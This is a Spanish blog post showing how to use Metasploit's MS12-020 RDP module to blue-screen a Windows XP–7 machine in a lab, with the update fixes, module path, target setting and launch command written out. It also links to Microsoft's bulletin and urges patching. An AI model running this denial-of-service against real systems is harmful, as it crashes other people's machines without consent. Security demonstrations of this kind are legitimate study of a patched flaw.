Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol) desde XP hasta W7.
Como era
previsible, hace poco empezaban a llegar noticias de exploits
funcionales que aprovechaban esta vulnerabilidad realizando un DoS al
equipo víctima, pero hoy he leído que Metasploit ya incorpora el exploit en su base de datos así que vamos a ver como aprovechar esto.
Para la demostración he utilizado una máquina virtual con Backtrack 5 R2 junto con Metasploit que ya viene instalado en esta distribución.
Lo primero que tenemos que hacer es actualizar metasploit, para ello utilizamos en una terminal:
msfupdate
Si os da problemas como a mí, haced lo siguiente que he encontrado aquí:
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
msfupdate
El siguiente paso es arrancar metasploit con:
msfconsole
a continuación escogemos el módulo a utilizar:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Si queremos ver los parámetros que requiere para su funcionamiento junto con información del módulo podemos usar
info
Como vemos con el comando info requiere del parámetro RHOST referente a la IP del objetivo (en el ejemplo 192.168.0.107), para asignarlo basta con:
set RHOST <ip>
en este caso:
set RHOST 192.168.0.107
y por último lanzamos el exploit:
run
Con esto deberíamos ver un precioso pantallazo azul en el Windows objetivo :D
Puesto que este era un post práctico he intentado ir lo mas directo que
he podido, si queréis más información sobre la vulnerabilidad aquí
tenéis unos enlaces interesantes:
- Boletín de seguridad de Microsoft MS12-020 - Crítica
- Exploit público para MS12-020 (Parchea!)
- FAQ sobre MS12-020
Con todo esto me despido, y a ver si consigo aumentar mi participación en este blog, un saludo ;)
Aetsu
2 comentarios:
Un placer que vuelvas a postear por estos lares.
a ver si me animo y aporto mas xD
Publicar un comentario